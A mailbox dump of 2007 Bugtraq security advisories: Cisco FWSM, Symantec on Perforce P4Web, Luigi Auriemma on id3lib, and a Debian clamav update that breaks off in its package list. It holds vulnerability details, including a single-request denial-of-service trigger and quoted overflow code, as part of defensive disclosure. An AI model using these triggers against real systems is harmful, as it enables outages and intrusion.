This vulnerability is documented in Cisco bug ID CSCsl08519.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsl08519 - FWSM Version 3.2.3 System Software may crash with
Application Layer Protocol Inspection
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of the vulnerability may result in a reload of
the FWSM. Repeated exploitation will result in a sustained denial of
service attack.
Software Versions and Fixes
==========================
When considering software upgrades, consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
FWSM software version 3.2(4) contains the fixes for the vulnerability
described in this document and will be available for download the week
beginning 31st December 2007.
FWSM software will be available for download from the following
location on cisco.com:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2
Workarounds
==========
* Disable the TCP normalizing function
Disabling the TCP normalizing function in the FWSM will mitigate
this vulnerability.
The TCP normalizer performs the following action: for traffic that
passes through the control-plane path, such as packets that require
Layer 7 inspection or management traffic, the FWSM sets the maximum
number of out-of-order packets that can be queued for a TCP
connection to 2 packets. The TCP normalizer is enabled by default
and is not configurable except to enable or disable.
To disable the TCP normalizing function, use the
"no control-point tcp-normalizer" command in global configuration
mode, as shown in the following example.
FWSM# config terminal
FWSM(config)# no control-point tcp-normalizer
FWSM(config)#
FWSM#
Disabling the "control-point tcp-normalizer" will prevent strict
TCP checks, such as detecting out-of-sequence segments and
monitoring TCP options, on the TCP packets received on the Control
Plane for Layer 7 inspection in the FWSM, will not be performed.
The feature should be re-enabled after upgrading to a fixed version
of software.
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound by
the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at
http://www.cisco.com.
Customers using Third-party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
This issue was first discovered via internal testing at Cisco. There
are no known instances of intentional exploitation of this issue.
However, Cisco has observed data streams that appear to be
unintentionally triggering the vulnerability.
Status of This Notice: INTERIM
=============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
===============
+-----------------------------------------------------------+
| Revision 1.0 | 2007-DECEMBER-19 | Initial public release. |
+-----------------------------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)
iD8DBQFHaUDv86n/Gc8U/uARAvHcAJ9dYJ4/qb39Ts591wBQc2TQrmZoEQCdFAPK
3jgY7lh9LmnGGhdJtyL/Q04=G7ty
-----END PGP SIGNATURE-----
From - Wed Dec 19 12:00:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004df4
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35029-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 251535CC01F
for <lists@securityspace.com>; Wed, 19 Dec 2007 11:58:58 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 08:42:19 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1FD7814376E; Wed, 19 Dec 2007 08:56:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23225 invoked from network); 18 Dec 2007 19:38:38 -0000
Date: 18 Dec 2007 20:14:02 -0000
Message-ID: <20071218201402.22503.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: research@symantec.com
To: bugtraq@securityfocus.com
Subject: SYMSA-2007-015
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID: SYMSA-2007-015
Advisory Title: Perforce P4Web Denial Of Service through resource
starvation
Author: Oliver Karow / Oliver_Karow@symantec.com
Release Date: 19 DEC 2007
Application: Perforce 2006.1
Platform: Win32
Severity: Remotely exploitable - Denial Of Service
Vendor status: Resolved
CVE Number: CVE-2007-6349
Reference:
http://www.securityfocus.com/bid/26806
Overview:
- From wikipedia: "Perforce is a commercial Revision Control (RC)
system. It is developed by Perforce Software, Inc. and was founded
in 1995 by Christopher Seiwald. The Perforce system is based on a
client/server model with the server managing the collection of
source versions in one or more depots. The server software runs on
the Unix, Mac OS X, or Microsoft Windows operating systems.
The client provides graphical and command line tools for a large
number of operating systems. Also available is a suite of plugins
that integrate with various programming IDEs and third party
applications, such as XCode, Autodesk 3D Studio Max, Alias Maya,
Adobe Photoshop, Microsoft Office, Eclipse and Emacs.
Other features of the system include support for reporting
(i.e. notifying users when a file has changed), branching and
merging, and defect tracking."
There is a denial of service (DoS) vulnerability in the P4Web Daemon
which make it possible to enforce a full CPU usage of the system, by
sending a single, special crafted HTTP request.
Details:
A single HTTP request with the Content-Length header variable set
to a value greater than zero in a request which no body, will cause
the P4Webs.exe process to consume 99% of CPU time on the target
system. of up to 99%.
The attack can be executed remotely. No authentication is required
for exploitation.
Vendor Response:
Perforce has confirmed an issue with Windows-based operating
systems and P4Web versions 2006.2 and prior that can result
in the P4Web host machine becoming unusable due to excessive
CPU usage. This was discovered by our QA department in
February of 2007, and addressed in our 2007.2 release.
Recommendation:
Users concerned about this issue should upgrade to P4Web
2007.2 or later, available at no charge from:
ftp://ftp.perforce.com/perforce/r07.2/bin.ntx86/p4webinst.exe
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (
http://cve.mitre.org), which standardizes
names for security problems.
CVE-2007-6349
- -------Symantec Consulting Services Advisory Information-------
For questions about this advisory, or to report an error:
cs_advisories@symantec.com
For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf
Consulting Services Advisory Archive:
http://www.symantec.com/research/
Consulting Services Advisory PGP Key:
http://www.symantec.com/research/Symantec_Consulting_Services_Advisories_PGP.asc
- -------------Symantec Product Advisory Information-------------
To Report a Security Vulnerability in a Symantec Product:
secure@symantec.com
For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/
Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html
Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc
- ---------------------------------------------------------------
Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from cs_advisories@symantec.com.
Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.
Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHaCx/uk7IIFI45IARAgT0AKCeOqwe0X+otU9ipBRsyZrloXRwnQCeO81L
KnCl3WqUuM9HdIvyfI77crs=Jrog
-----END PGP SIGNATURE-----
From - Wed Dec 19 13:10:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004df7
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35031-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 08B875CC031
for <lists@securityspace.com>; Wed, 19 Dec 2007 13:07:45 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 10:03:53 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 469B31439B7; Wed, 19 Dec 2007 10:05:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6385 invoked from network); 19 Dec 2007 17:15:14 -0000
Date: Wed, 19 Dec 2007 18:59:03 +0100
From: Luigi Auriemma <aluigi@autistici.org>
To: bugtraq@securityfocus.com, bugs@securitytracker.com,
news@securiteam.com, full-disclosure@lists.grok.org.uk,
vuln@secunia.com, packet@packetstormsecurity.org
Subject: Array overflow in id3lib (devel CVS)
Message-Id: <20071219185903.781e8817.aluigi@autistici.org>
X-Mailer:
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Status:
#######################################################################
Luigi Auriemma
Application: id3lib
http://id3lib.sourceforge.net
Versions: only devel (CVS)
stable (3.8.3) is NOT affected
Platforms: Windows, *nix and Mac
Bug: array overflow
Exploitation: local
Date: 19 Dec 2007
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
==============1) Introduction
==============
id3lib is a well known and used library for handling the ID3 tags in
the audio files.
Actually the library is divided in two branches: stable (3.8.3 released
in the far 2003) and devel (the current CVS).
Although the vulnerable instructions are located in both the versions
only the devel is exploitable because the ID3v2 4.0 tags are not
supported in the stable (watch ID3V2_LATEST in globals.h).
#######################################################################
=====2) Bug
=====
The problem is in the extflags array (a pointer to array) which has a
size of only one element while the extflagbytes can support from 0 to
255 elements.
So, using a extflagbytes of 0 will be caused a crash since the
subsequent instructions consider extflags[0] initialized while using
higher values is possible to overflow this small array.
>From header_tag.cpp:
void ID3_TagHeader::ParseExtended(ID3_Reader& reader)
...
const int extflagbytes = reader.readChar(); //Number of flag bytes
ID3_Flags* extflags[1]; // ID3V2_4_0 has 1 flag byte, extflagbytes
should be equal to 1 for (i = 0; i < extflagbytes; ++i)
{
extflags[i] = new ID3_Flags;
extflags[i]->set(reader.readChar()); //flags
}
I have many doubts about the real exploitation of this overflow for
executing malicious code, but I can't exclude it at all.
#######################################################################
==========3) The Code
==========
http://aluigi.org/poc/id3libexec.zip
#######################################################################
=====4) Fix
=====
I have sent a mail to the developers but later I have read on the
mailing-list of the project that the development of id3lib is
practically dead.
#######################################################################
---
Luigi Auriemma
http://aluigi.org
From - Wed Dec 19 13:40:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004df9
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35030-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id AB2E55CC028
for <lists@securityspace.com>; Wed, 19 Dec 2007 13:33:02 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 10:16:23 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A2A711437ED; Wed, 19 Dec 2007 10:05:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2410 invoked from network); 19 Dec 2007 16:50:49 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: debian-security-announce@lists.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Wed, 19 Dec 2007 18:38:04 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20071219173804.GA4542@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.17 (2007-11-01)
X-SA-Exim-Connect-IP: 82.83.237.198
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1435-1] New clamav packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <Mrm6bKXTIJN.A.-vG.IcVaHB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 19 Dec 2007 17:38:16 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1435-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
December 19, 2007
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : clamav
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2007-6335 CVE-2007-6336
Several remote vulnerabilities have been discovered in the Clam
anti-virus toolkit. The Common Vulnerabilities and Exposures project
identifies the following problems:
CVE-2007-6335
It was discovered that an integer overflow in the decompression code
for MEW archives may lead to the execution of arbitrary code.
CVE-2007-6336
It was discovered that on off-by-one in the MS-ZIP decompression
code may lead to the execution of arbitrary code.
For the stable distribution (etch), these problems have been fixed in
version 0.90.1-3etch8.
The old stable distribution (sarge) is not affected by these problems.
However, since the clamav version from Sarge cannot process all current
Clam malware signatures any longer, support for the ClamAV in Sarge is
now discontinued. We recommend to upgrade the the stable distribution
or run a backport of the stable version.
The unstable distribution (sid) will be fixed soon.
We recommend that you upgrade your clamav packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian 4.0 (stable)
- -------------------
Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1.orig.tar.gz
Size/MD5 checksum: 11643310 cd11c05b5476262eaea4fa3bd7dc25bf
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8.dsc
Size/MD5 checksum: 886 749c91e6c5ba5fc237e8a2176fdadb95
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8.diff.gz
Size/MD5 checksum: 207113 333bd216cf5347d99f59258a3c3a66ed
Architecture independent packages:
http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.90.1-3etch8_all.deb
Size/MD5 checksum: 1005018 117b5356ff6f6b661c1e40fc9d801684
http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.90.1-3etch8_all.deb
Size/MD5 checksum: 201722 aa2b7f1a58ca407b390449ca46f4ab27
http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.90.1-3etch8_all.deb
Size/MD5 checksum: 157958 49b16840258b5ceedfe0b71b96dbcedb
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 644446 694b0ad3130abf2e2db1e63760362836
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 406370 83cc1d74a4c6f0972d13d06f3a797fb2
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 511388 07bfeca8da437193d8e37bfa67e1795e
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 9303942 40bc5413ec2757d45afaafeb4dd780ca
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 184780 ce83079b346a0677478fcda3e8eb82c2
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 180400 ac5d647a73691f65ab65c9c7abf30d2a
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_alpha.deb
Size/MD5 checksum: 863570 9020d874cea3fb66cfcad4f13853c714
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 177672 b41de0132a31e306926a539208c9040e
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 9301374 ef7c3f347faae5dfeeeb0b23443299f1
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 385814 4ac88e34ed1a21766867874d1147a883
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 639602 1b1cd8162ea42086321c0a4863b23a60
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 177104 560d52f19f0a3faf7aad14ee96b53810
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 367736 206ba38fb4ecaf940159e2cff5471ab4
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_amd64.deb
Size/MD5 checksum: 856186 e507b156b818853bafa5ac249759f8ec
arm architecture (ARM)
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 363636 cffe11f51a8a7da7805e0653da528742
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 171294 e37b91b2d63de0b2502f27ad3ada1bff
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 598070 2640254d36f5a409f21c3282f3ae9973
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 853018 81f2af2c8dd9549f732a5f71031d48a2
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 9299274 b7db8bdfb726918d10c06e54676e51db
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 175440 f6dc5d29f78684c13c4d49aa9fff7c94
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_arm.deb
Size/MD5 checksum: 366796 ec589953394837dc9e7262881748d1d5
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 405300 f638617d5d10ad818efff8fef2815f9d
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 9303368 f759a6ecd5f1727f5cff479774a2602f
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 618512 e8cbc9c8eca895318be39d9ca4f04523
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 177502 bb227c43e15ee60249c8a5a5f16f1fbd
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 433084 2ce4b1d59e41c5c291c7199bcc6fb9d5
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 178236 7cc4ba752cd13f70620ff7137dbce8a0
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_hppa.deb
Size/MD5 checksum: 857310 f7c02fb3d1dee8f7decdffd2a3b6bd3f
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 175186 a9c3384d138654c8e88d68f32cd2d145
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 172496 425b78dc05726d6665e0aafe0997ec3b
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 855838 eee3404134bb37263f0ef0f04bf0337a
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 368002 c4272fb334334b1605ff79c176c00e3e
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 9300764 89bd6809bba1487479f7c4aa9cfd06b7
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 604926 5304dab5e5f0c0900b33896ded343b2b
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_i386.deb
Size/MD5 checksum: 365918 b8772ed7682c2028bf275cdcb9230e58
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 521858 ef5910b4071a93492e37ffaa792e54c6
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 9315402 abb8f40eb67f00eb44a7ccbf1ae3d9a5
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 192068 9e517f5aa84a7d3ba7f853aaacd0f194
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 878588 9815569fb986a09e7e0283b46c279cbd
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 201788 30ef29ed88c0f577d441613db29d7134
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 657300 2698e002dad3f5ca8a2daa30f5aa36f6
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_ia64.deb
Size/MD5 checksum: 475254 cdbb3e6d452e0bee37691c8d1e21e80d
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 647472 89dcd677a82c850725d27a427074e417
http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 175790 2920bababb9c8abc7577aaf2571236c5
http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 9301644 210081a84344c3f0fe1f75e3a69f4ccd
http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 435676 3fd14c67c544b5072aa40573ed13e86a
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 854796 e2c92a765a76b8c1f28d4b378146ddbc
http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 180006 e8827073df24db0522bb7bf825ffeece
http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1-3etch8_mips.deb
Size/MD5 checksum: 372486 aa30a661b9ff5547f6abed40e1f78485
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1-3etch8_mipsel.deb
